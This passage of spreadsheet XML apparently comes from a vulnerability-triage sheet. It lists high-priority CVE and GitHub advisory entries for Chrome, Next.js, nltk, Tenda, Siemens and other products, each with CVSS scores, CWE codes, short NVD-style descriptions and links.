t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.003</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr" /><c r="K126" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L126" s="5" t="inlineStr" /><c r="M126" s="5" t="inlineStr" /><c r="N126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O126" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P126" s="5" t="inlineStr" /><c r="Q126" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R126" s="5" t="inlineStr"><is><t>Use after free in Dawn in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84333</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-84352</t></is></c><c r="D127" s="5" t="n"><v>9.6</v></c><c r="E127" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.003</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr" /><c r="K127" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L127" s="5" t="inlineStr" /><c r="M127" s="5" t="inlineStr" /><c r="N127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O127" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P127" s="5" t="inlineStr" /><c r="Q127" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R127" s="5" t="inlineStr"><is><t>Use after free in WebGL in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t></is></c><c r="S127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84352</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-84353</t></is></c><c r="D128" s="5" t="n"><v>9.6</v></c><c r="E128" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F128" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.003</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr" /><c r="K128" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L128" s="5" t="inlineStr" /><c r="M128" s="5" t="inlineStr" /><c r="N128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O128" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P128" s="5" t="inlineStr" /><c r="Q128" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R128" s="5" t="inlineStr"><is><t>Use after free in Shared Tab Groups in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t></is></c><c r="S128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84353</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-85042</t></is></c><c r="D129" s="5" t="n"><v>9.6</v></c><c r="E129" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.003</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr" /><c r="K129" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L129" s="5" t="inlineStr" /><c r="M129" s="5" t="inlineStr" /><c r="N129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O129" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P129" s="5" t="inlineStr" /><c r="Q129" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R129" s="5" t="inlineStr"><is><t>Use after free in DevTools in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85042</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-85047</t></is></c><c r="D130" s="5" t="n"><v>9.6</v></c><c r="E130" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F130" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.003</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr" /><c r="K130" s="5" t="inlineStr"><is><t>apple:iphone_os, google:chrome</t></is></c><c r="L130" s="5" t="inlineStr" /><c r="M130" s="5" t="inlineStr" /><c r="N130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O130" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P130" s="5" t="inlineStr" /><c r="Q130" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R130" s="5" t="inlineStr"><is><t>Improper input validation in Transactions Platform in Google Chrome on on iOS prior to 152.0.7977.82 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t></is></c><c r="S130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85047</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-85050</t></is></c><c r="D131" s="5" t="n"><v>9.6</v></c><c r="E131" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.003</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr" /><c r="K131" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L131" s="5" t="inlineStr" /><c r="M131" s="5" t="inlineStr" /><c r="N131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O131" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P131" s="5" t="inlineStr" /><c r="Q131" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R131" s="5" t="inlineStr"><is><t>Out of bounds write in WebGL in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85050</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-85085</t></is></c><c r="D132" s="5" t="n"><v>9.6</v></c><c r="E132" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.002</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr" /><c r="K132" s="5" t="inlineStr" /><c r="L132" s="5" t="inlineStr" /><c r="M132" s="5" t="inlineStr" /><c r="N132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O132" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P132" s="5" t="inlineStr" /><c r="Q132" s="5" t="inlineStr"><is><t>CWE-940</t></is></c><c r="R132" s="5" t="inlineStr"><is><t>The Canva Android App before 2.376.0 allowed an external origin to be loaded in a privileged WebView. A threat actor who controls the page loaded by the user is able to communicate with Canva using the user’s session.</t></is></c><c r="S132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85085</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D133" s="5" t="n"><v>9.5</v></c><c r="E133" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="inlineStr" /><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr" /><c r="K133" s="5" t="inlineStr" /><c r="L133" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M133" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N133" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O133" s="5" t="inlineStr" /><c r="P133" s="5" t="inlineStr" /><c r="Q133" s="5" t="inlineStr"><is><t>CWE-1395</t></is></c><c r="R133" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="S133" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-52777</t></is></c><c r="D134" s="5" t="n"><v>9.4</v></c><c r="E134" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.002</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr" /><c r="K134" s="5" t="inlineStr" /><c r="L134" s="5" t="inlineStr" /><c r="M134" s="5" t="inlineStr" /><c r="N134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O134" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P134" s="5" t="inlineStr" /><c r="Q134" s="5" t="inlineStr"><is><t>CWE-352, CWE-502</t></is></c><c r="R134" s="5" t="inlineStr"><is><t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, there is an authenticated PHP object injection vulnerability in BazarImportAction via unserialize. This issue has been patched in version 4.6.6.</t></is></c><c r="S134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52777</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-75925</t></is></c><c r="D135" s="5" t="n"><v>9.4</v></c><c r="E135" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.007</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr" /><c r="K135" s="5" t="inlineStr" /><c r="L135" s="5" t="inlineStr" /><c r="M135" s="5" t="inlineStr" /><c r="N135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O135" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P135" s="5" t="inlineStr" /><c r="Q135" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R135" s="5" t="inlineStr"><is><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is></c><c r="S135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75925</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C136" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D136" s="5" t="n"><v>9.4</v></c><c r="E136" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F136" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G136" s="5" t="inlineStr" /><c r="H136" s="5" t="n"><v>0.003</v></c><c r="I136" s="5" t="inlineStr" /><c r="J136" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K136" s="5" t="inlineStr" /><c r="L136" s="5" t="inlineStr" /><c r="M136" s="5" t="inlineStr" /><c r="N136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P136" s="5" t="inlineStr" /><c r="Q136" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R136" s="5" t="inlineStr"><is><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is></c><c r="S136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="137"><c r="A137" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B137" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C137" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D137" s="5" t="n"><v>9.4</v></c><c r="E137" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F137" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G137" s="5" t="inlineStr" /><c r="H137" s="5" t="n"><v>0.003</v></c><c r="I137" s="5" t="inlineStr" /><c r="J137" s="5" t="inlineStr" /><c r="K137" s="5" t="inlineStr" /><c r="L137" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M137" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N137" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O137" s="5" t="inlineStr" /><c r="P137" s="5" t="inlineStr" /><c r="Q137" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R137"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S137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="138"><c r="A138" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C138" s="5" t="inlineStr"><is><t>CVE-2026-82533</t></is></c><c r="D138" s="5" t="n"><v>9.4</v></c><c r="E138" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F138" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G138" s="5" t="inlineStr" /><c r="H138" s="5" t="n"><v>0.006</v></c><c r="I138" s="5" t="inlineStr" /><c r="J138" s="5" t="inlineStr" /><c r="K138" s="5" t="inlineStr" /><c r="L138" s="5" t="inlineStr" /><c r="M138" s="5" t="inlineStr" /><c r="N138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P138" s="5" t="inlineStr" /><c r="Q138" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="R138" s="5" t="inlineStr"><is><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is></c><c r="S138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t></is></c></row><row r="139"><c r="A139" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B139" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C139" s="5" t="inlineStr"><is><t>CVE-2026-86123</t></is></c><c r="D139" s="5" t="n"><v>9.4</v></c><c r="E139" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F139" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G139" s="5" t="inlineStr" /><c r="H139" s="5" t="n"><v>0.003</v></c><c r="I139" s="5" t="inlineStr" /><c r="J139" s="5" t="inlineStr" /><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr" /><c r="M139" s="5" t="inlineStr" /><c r="N139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O139" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P139" s="5" t="inlineStr" /><c r="Q139" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R139" s="5" t="inlineStr"><is><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is></c><c r="S139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86123</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>CVE-2026-86148</t></is></c><c r="D140" s="5" t="n"><v>9.4</v></c><c r="E140" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F140" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="n"><v>0.025</v></c><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr" /><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr" /><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O140" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P140" s="5" t="inlineStr" /><c r="Q140" s="5" t="inlineStr"><is><t>CWE-77, CWE-78</t></is></c><c r="R140" s="5" t="inlineStr"><is><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is></c><c r="S140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86148</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>CVE-2026-86149</t></is></c><c r="D141" s="5" t="n"><v>9.4</v></c><c r="E141" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="n"><v>0.02</v></c><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr" /><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O141" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P141" s="5" t="inlineStr" /><c r="Q141" s="5" t="inlineStr"><is><t>CWE-77, CWE-78</t></is></c><c r="R141" s="5" t="inlineStr"><is><t>A weakness has been identified in Tenda CP3 27.5.57.101. This issue affects some unknown processing of the file Net/NetCheckPing.cpp. This manipulation of the argument interface_name/host causes os command injection. The attack can be initiated remotely.</t></is></c><c r="S141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86149</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>CVE-2026-86153</t></is></c><c r="D142" s="5" t="n"><v>9.4</v></c><c r="E142" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="n"><v>0.004</v></c><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr" /><c r="M142" s="5" t="inlineStr" /><c r="N142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O142" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P142" s="5" t="inlineStr" /><c r="Q142" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="R142" s="5" t="inlineStr"><is><t>A vulnerability has been found in Tenda CP3 27.5.57.101. This affects the function CRedirServer::SetRedirectEnable of the file Functions/Redirect.cpp. The manipulation leads to improper privilege management. Remote exploitation of the attack is possible.</t></is></c><c r="S142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86153</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>CVE-2023-54391</t></is></c><c r="D143" s="5" t="n"><v>9.300000000000001</v></c><c r="E143" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F143" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="n"><v>0.017</v></c><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr" /><c r="L143" s="5" t="inlineStr" /><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P143" s="5" t="inlineStr" /><c r="Q143" s="5" t="inlineStr"><is><t>CWE-304</t></is></c><c r="R143" s="5" t="inlineStr"><is><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is></c><c r="S143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2023-54391</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>CVE-2024-58376</t></is></c><c r="D144" s="5" t="n"><v>9.300000000000001</v></c><c r="E144" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F144" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="n"><v>0.017</v></c><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr" /><c r="K144" s="5" t="inlineStr" /><c r="L144" s="5" t="inlineStr" /><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P144" s="5" t="inlineStr" /><c r="Q144" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R144" s="5" t="inlineStr"><is><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is></c><c r="S144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2024-58376</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>CVE-2026-16279</t></is></c><c r="D145" s="5" t="n"><v>9.300000000000001</v></c><c r="E145" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>3DS.Information-Security@3ds.com</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="n"><v>0.003</v></c><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr" /><c r="K145" s="5" t="inlineStr" /><c r="L145" s="5" t="inlineStr" /><c r="M145" s="5" t="inlineStr" /><c r="N145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O145" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P145" s="5" t="inlineStr" /><c r="Q145" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="R145" s="5" t="inlineStr"><is><t>An Improper Authorization vulnerability affecting 3DPassport in 3DSwymer from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2026x could allow an attacker to gain access to some user accounts.</t></is></c><c r="S145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16279</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>CVE-2026-55068</t></is></c><c r="D146" s="5" t="n"><v>9.300000000000001</v></c><c r="E146" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="n"><v>0.004</v></c><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K146" s="5" t="inlineStr" /><c r="L146" s="5" t="inlineStr" /><c r="M146" s="5" t="inlineStr" /><c r="N146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O146" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P146" s="5" t="inlineStr" /><c r="Q146" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R146" s="5" t="inlineStr"><is><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is></c><c r="S146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>CVE-2026-56705</t></is></c><c r="D147" s="5" t="n"><v>9.300000000000001</v></c><c r="E147" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="n"><v>0.005</v></c><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr" /><c r="K147" s="5" t="inlineStr" /><c r="L147" s="5" t="inlineStr" /><c r="M147" s="5" t="inlineStr" /><c r="N147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O147" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P147" s="5" t="inlineStr" /><c r="Q147" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R147" s="5" t="inlineStr"><is><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is></c><c r="S147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56705</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>CVE-2026-62645</t></is></c><c r="D148" s="5" t="n"><v>9.300000000000001</v></c><c r="E148" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F148" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="n"><v>0.003</v></c><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr" /><c r="K148" s="5" t="inlineStr" /><c r="L148" s="5" t="inlineStr" /><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr" /><c r="Q148" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R148" s="5" t="inlineStr"><is><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is></c><c r="S148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>CVE-2026-62647</t></is></c><c r="D149" s="5" t="n"><v>9.300000000000001</v></c><c r="E149" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F149" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="n"><v>0.003</v></c><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr" /><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr" /><c r="Q149" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R149" s="5" t="inlineStr"><is><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is></c><c r="S149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C150" s="5" 